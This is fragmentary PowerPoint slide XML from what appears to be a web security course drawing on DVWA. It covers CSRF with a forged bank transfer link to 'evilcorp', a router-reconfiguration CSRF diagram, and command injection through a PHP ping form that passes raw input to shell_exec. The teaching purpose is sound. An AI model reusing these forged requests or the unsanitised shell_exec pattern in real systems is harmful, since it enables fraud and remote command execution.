            <a:ext cx="1905372" cy="11090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46065" y="518902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37024" y="4105220"/>
            <a:ext cx="1102102" cy="11021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206486"/>
            <a:ext cx="1240078" cy="17857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04899" y="236770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bank.com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32044" y="3736836"/>
            <a:ext cx="10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evil.com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1702" y="1905000"/>
            <a:ext cx="1102102" cy="110210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53542" y="937694"/>
            <a:ext cx="597330" cy="60745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168074" y="1432205"/>
            <a:ext cx="422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transfer?amount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=10000&amp;dest=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>evilcorp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39064" y="5287310"/>
            <a:ext cx="2932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Cookie checks out! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sending $10000 to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>EvilCorp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905000" y="2286000"/>
            <a:ext cx="0" cy="133430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39004" y="2286000"/>
            <a:ext cx="0" cy="13307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96197" y="2904045"/>
            <a:ext cx="4112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=“http://bank.com/</a:t>
            </a:r>
          </a:p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transfer?amount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=10000&amp;id=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evilcorp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”&gt;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384951" y="1820176"/>
            <a:ext cx="3549249" cy="11869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55665" y="4206486"/>
            <a:ext cx="4073735" cy="59411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99941" y="462548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$10000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1503" y="1831676"/>
            <a:ext cx="1237500" cy="124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94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5.55556E-6 L 2.22222E-6 -5.55556E-6 C 0.01771 0.0118 0.00191 -0.00024 0.01302 0.01157 C 0.02083 0.0199 0.01823 0.0155 0.02621 0.02175 C 0.02969 0.02453 0.03264 0.02823 0.03611 0.03055 C 0.03889 0.03263 0.04219 0.03333 0.04496 0.03495 C 0.04618 0.03587 0.04705 0.03726 0.04826 0.03796 C 0.05 0.03911 0.05191 0.03981 0.05382 0.04097 C 0.06111 0.04513 0.06857 0.0493 0.07569 0.05416 C 0.08316 0.05902 0.08906 0.06319 0.0967 0.06736 C 0.09878 0.06851 0.10104 0.06898 0.1033 0.07013 C 0.11094 0.0743 0.11823 0.08009 0.12621 0.08333 C 0.13003 0.08495 0.13368 0.08611 0.13732 0.08773 C 0.14062 0.08935 0.14392 0.09189 0.14722 0.09374 C 0.15 0.09513 0.15312 0.09629 0.1559 0.09814 C 0.15816 0.0993 0.16024 0.10138 0.1625 0.10254 C 0.16962 0.10578 0.16597 0.10208 0.17135 0.10532 C 0.19479 0.11967 0.17048 0.10624 0.19219 0.11851 C 0.1941 0.11967 0.19583 0.12083 0.19774 0.12152 C 0.20642 0.12499 0.2 0.12106 0.20764 0.1243 C 0.21059 0.12569 0.21354 0.12754 0.21649 0.1287 C 0.23611 0.13796 0.23073 0.13587 0.24496 0.1405 C 0.24601 0.14143 0.24705 0.14259 0.24826 0.14351 C 0.25 0.14467 0.25191 0.1456 0.25382 0.14629 C 0.2592 0.14884 0.26476 0.15115 0.27031 0.1537 L 0.27691 0.15671 C 0.27795 0.15717 0.27899 0.15763 0.28021 0.1581 C 0.2816 0.15856 0.28316 0.15879 0.28455 0.15948 C 0.28455 0.15948 0.29548 0.16689 0.29774 0.16828 C 0.29913 0.16944 0.30052 0.1706 0.30208 0.17129 C 0.30434 0.17222 0.3066 0.17314 0.30868 0.1743 C 0.31302 0.17638 0.31371 0.17708 0.31753 0.1787 C 0.31892 0.17916 0.32048 0.17962 0.32187 0.18009 C 0.32378 0.18148 0.32552 0.1831 0.32743 0.18448 C 0.32917 0.18564 0.33125 0.18611 0.33298 0.18749 C 0.33455 0.18865 0.33576 0.1905 0.33732 0.19189 C 0.33837 0.19259 0.33958 0.19259 0.34062 0.19328 C 0.34219 0.19421 0.34357 0.19513 0.34496 0.19629 C 0.34618 0.19768 0.34705 0.1993 0.34826 0.20069 C 0.34982 0.20231 0.35625 0.20717 0.35712 0.20786 C 0.35816 0.20879 0.3592 0.20995 0.36042 0.21087 C 0.3618 0.21203 0.36337 0.21296 0.36476 0.21388 C 0.36927 0.2162 0.36701 0.21365 0.36927 0.21666 L 0.36927 0.21828 " pathEditMode="relative" ptsTypes="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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0" grpId="0"/>
      <p:bldP spid="2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Site Request Forgery (CSRF)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i="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSRF attack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causes the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>end </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>user browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to execute unwanted actions on a web application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is currently authenticated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4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Example: Home Router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73</a:t>
            </a:fld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176713" y="1981200"/>
            <a:ext cx="14527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Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>Home router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600201" y="4101925"/>
            <a:ext cx="5568700" cy="1093407"/>
            <a:chOff x="1600201" y="4101925"/>
            <a:chExt cx="5568700" cy="1093407"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="12" name="Straight Arrow Connector 20"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="26" idx="0"/>
              <a:endCxn id="25" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="1600201" y="4101925"/>
              <a:ext cx="5568700" cy="109340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6" name="TextBox 29"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="539831">
              <a:off x="2891631" y="4245308"/>
              <a:ext cx="29321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mbria"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                  <a:cs typeface="Cambria"/>
                </a:rPr>
                <a:t>3. malicious page</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="Cambria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600201" y="3071813"/>
            <a:ext cx="2757487" cy="1030112"/>
            <a:chOff x="1600201" y="3071813"/>
            <a:chExt cx="2757487" cy="1030112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="TextBox 24"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="20410878">
              <a:off x="1686026" y="3376911"/>
              <a:ext cx="17891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mbria"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                  <a:cs typeface="Cambria"/>
                </a:rPr>
                <a:t>4. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                  <a:cs typeface="Cambria"/>
                </a:rPr>
                <a:t>configs</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                  <a:cs typeface="Cambria"/>
                </a:rPr>
                <a:t> access</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="Cambria"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="20" name="Straight Arrow Connector 23"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="25" idx="3"/>
              <a:endCxn id="22" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="1600201" y="3071813"/>
              <a:ext cx="2757487" cy="1030112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pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 2" descr="http://www.usc-b2b.com/UNIQUE/images/L2100001.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect l="21349" t="5804" r="17416" b="8801"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4357688" y="2347913"/>
            <a:ext cx="10382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ounded Rectangular Callout 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6094413" y="1600200"/>
            <a:ext cx="2744787" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -80881"/>
              <a:gd name="adj2" fmla="val 5119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Attacker can enable remote admin, reset password, etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rounded Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="27487" y="3797125"/>
            <a:ext cx="1572714" cy="6096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Browser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248400" y="5195332"/>
            <a:ext cx="1841002" cy="6096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Attacker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813844" y="2634734"/>
            <a:ext cx="3543844" cy="1162391"/>
            <a:chOff x="813844" y="2634734"/>
            <a:chExt cx="3543844" cy="1162391"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 19"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1371600" y="2634734"/>
              <a:ext cx="20298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mbria"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                  <a:cs typeface="Cambria"/>
                </a:rPr>
                <a:t>1. configure </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                  <a:cs typeface="Cambria"/>
                </a:rPr>
                <a:t>router</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="40" name="Elbow Connector 39"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="25" idx="0"/>
              <a:endCxn id="22" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="2223110" y="1662547"/>
              <a:ext cx="725312" cy="3543844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813845" y="4406724"/>
            <a:ext cx="5434556" cy="1093408"/>
            <a:chOff x="813845" y="4406724"/>
            <a:chExt cx="5434556" cy="1093408"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="TextBox 26"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2010877" y="5130800"/>
              <a:ext cx="313940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mbria"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                  <a:cs typeface="Cambria"/>
                </a:rPr>
                <a:t>2. visits malicious </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                  <a:cs typeface="Cambria"/>
                </a:rPr>
                <a:t>site</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="42" name="Elbow Connector 41"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="25" idx="2"/>
              <a:endCxn id="26" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="2984419" y="2236150"/>
              <a:ext cx="1093407" cy="543455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ounded Rectangle 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5986985" y="3352800"/>
            <a:ext cx="2852215" cy="12954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50% of home routers have default or no pw*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6200" y="6488668"/>
            <a:ext cx="6722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source: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“Drive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-By </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pharming”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Stamm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et al. Symantec report, 2006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63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1" grpId="0" animBg="1"/>
      <p:bldP spid="5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800600"/>
            <a:ext cx="66799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Credits:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Examples </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>based on DVWA (http://www.dvwa.co.uk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Collin Jackson’s Web Security Course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caffeinept.blogspot.com/2012/01/dvwa-sql-injection.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Graphics from The Noun Project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00300" y="1524000"/>
            <a:ext cx="4343400" cy="73866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4800" dirty="0" smtClean="0"/>
              <a:t>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2453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2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8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638800" y="1447800"/>
            <a:ext cx="2438400" cy="6096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98358" y="1447800"/>
            <a:ext cx="2438400" cy="6096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Client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11" descr="Screen Shot 2012-07-02 at 11.42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717" y="2743947"/>
            <a:ext cx="4051300" cy="1397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4400" y="533400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 smtClean="0"/>
              <a:t>1. http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>site.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>/exec/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Elbow Connector 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4487779" y="-992271"/>
            <a:ext cx="12700" cy="474044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123908" y="2133600"/>
            <a:ext cx="4740442" cy="698847"/>
            <a:chOff x="2123908" y="2965450"/>
            <a:chExt cx="4740442" cy="698847"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="17" name="Elbow Connector 16"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="4487779" y="601579"/>
              <a:ext cx="12700" cy="4740442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123908" y="3202632"/>
              <a:ext cx="1822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  <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                <a:t>. Send page</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="24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52400" y="4293275"/>
            <a:ext cx="6657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dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>h2&gt;Ping for FREE&lt;/h2&gt;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dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>p&gt;Enter an IP address below:&lt;/p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p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dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>form name="ping" action="#" method="post"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>type="text" name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>" size="30"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p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dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>input type="submit" value="submit" name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>submit”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p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dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/form&gt;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6477000" y="4792720"/>
            <a:ext cx="2438400" cy="930160"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -72917"/>
              <a:gd name="adj2" fmla="val 24373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Input to form program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514600" y="5410200"/>
            <a:ext cx="1371600" cy="31268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24800" y="1939620"/>
            <a:ext cx="651999" cy="65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86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9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638800" y="1447800"/>
            <a:ext cx="2438400" cy="6096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98358" y="1447800"/>
            <a:ext cx="2438400" cy="6096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14" name="Elbow Connector 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4487779" y="-992271"/>
            <a:ext cx="12700" cy="474044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5" idx="3"/>
            <a:endCxn id="10" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="3954379" y="220579"/>
            <a:ext cx="685800" cy="43594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23908" y="2370782"/>
            <a:ext cx="1780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output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4293275"/>
            <a:ext cx="6657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dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>h2&gt;Ping for FREE&lt;/h2&gt;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dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>p&gt;Enter an IP address below:&lt;/p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p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dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>form name="ping" action="#" method="post"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>type="text" name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>" size="30"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p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dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>input type="submit" value="submit" name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>submit”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p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dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/form&gt;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514600" y="5410200"/>
            <a:ext cx="1371600" cy="31268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5" name="Snip Single Corner Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4343400" y="2743200"/>
            <a:ext cx="4267200" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="snip1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 dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = $_REQUEST[‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>']; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> $o = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>shell_exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(‘ping –C 3’ . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>$t)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>;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echo $o</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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05940" y="4256393"/>
            <a:ext cx="214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PHP exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>rogram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10095" y="0"/>
            <a:ext cx="4653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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/vulnerabilities/exec/ HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: 172.16.59.128</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=127.0.0.1&amp;submit=submit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6380020" y="533400"/>
            <a:ext cx="1676400" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -184366"/>
              <a:gd name="adj2" fmla="val 45076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ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858000" y="2057400"/>
            <a:ext cx="635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26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EgROsvYJr9WlM1wRei0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6xg7Dt6H5Yz7z7DT3FG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2pIhzqOomffMJobGx7W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Zh0mnJPcxXhtguRpmTGS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SMneHn7yrNI37IUbHZb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isUkgadgIqnX8zZu7Pp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yrKHrIYTvM1UtVkn7Xk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iF9AlbcRmpT8DUszyJvh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We54aJHs4EAfMB75wL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8LQ0RNyeOUgm4dmg727FX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2EGYrDYvMNeOse3jW8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2HWuJV9V0smEon833pS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jTHnLPpJTtpjhOmaO7AP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oT13JbwJyJILYBGNzM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uaqH871DqlPjSYRNl0I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y5AbdqNgCBf0UJBmA3u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nSs6CO0dMam9JBk6XUBQ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3R47cZpEszDac84BBM3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Ra7ggC9TgYEEpfxHOdmv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6r8XTiZ36SNaZT0VJNvz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vyJO4UYPuVYh4G8iJQU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aDbSJvOQYWtWxGbyfln2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qvo4Ium2FZAvgeaSXL2Av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mHq0BQ1hpzXQZzFl9NZ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3wRDPQI7iQcqObivc0X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mzPbYz0efPNzsEU8Y1bzh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7EzKt2EAZdYPGW2rQgHT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oQmxoneZL6N5saCe5YAE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DXY5xaURne6gJoWDgm0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BtRPCaIjobNfIzphGOR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mUTP9kjiP9IBlueIyK9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stFmeZFbADCK7WVM1n0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w7eV3Yf65l1rspaM6k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Y7C9JbeBmvHCbxp1qMTk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ZAniMMJL3JzNWx8jWGW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JGtwBehFtG5s8EyLctm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REtCENoVH5wIQHOgavto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IuptKbut6eYrOP3ZAuhy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VqNQWWiRQT1YWYca2dr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JpSYcbVZ7HUIyZGTeyaf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5pQS4Mpr36K1EGnYXJ7W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4dpdt8ZS4JTEZ268ovx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9HUjiVgO3ixj5MFEzWj4d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L2oWRBIriIJUwvUadJ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879Xa5DQyah1pW5lDQq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llUgrtPzeZmtp9hUZodl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mR89EL5l9FQpGuGq7SR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q6mDfekQFA6Kxoi